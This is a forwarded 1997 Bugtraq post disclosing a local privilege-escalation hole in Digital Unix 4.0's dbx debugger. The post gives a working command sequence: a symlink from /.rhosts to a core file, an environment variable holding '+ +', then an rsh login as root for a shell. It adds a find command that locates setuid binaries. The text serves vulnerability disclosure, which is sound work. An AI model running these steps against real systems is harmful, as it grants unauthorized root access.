forwarded from bugtraq. I couldn't get it to work on my box since I don't
have licenses for any of the developer stuff.
beckers
---------- Forwarded message ----------
Date: Fri, 14 Nov 1997 12:37:20 -0500
From: John McDonald <jmcdonal_at_OSPREY.UNF.EDU>
To: BUGTRAQ_at_NETSPACE.ORG
Subject: digital unix 4.0 hole
I've verified this on 3 boxes running Digital unix 4.0..
If you run dbx (tested on 3.11.10) on a setuid root program that you have
read access to, the program will core dump and create a root owned 600
perm core in the current directory. You might have to run dbx one or two
times to get it to work.. The message you are looking for is:
dbx version 3.11.10
Type 'help' for help.
warning: /bin/crontab has no symbol table -- very little is supported
without it
Could not attach to process 10112
cannot run program
Exiting due to error during startup
Now, this core dump will follow symlinks.. and using the trick mentioned
earlier with embedding + + in a core dump, you can easily grab root.
ln -s /.rhosts core
BOB42="
+ +
"
export BOB42
dbx /bin/crontab
rsh -l root localhost /bin/sh -i
I'm not sure this will work on other Digital Unix boxes, and I'm not sure
why it works.. So, email me if you get it to work.. I'm not sure, but I
think this might be a bug in the process-tracing implementation..
I think this will locate all of the vulnerable setuid binaries -
find / -perm -4004 -print
humble - jmcdonal_at_unf.edu
Received on Sat Nov 15 1997 - 15:56:32 NZDT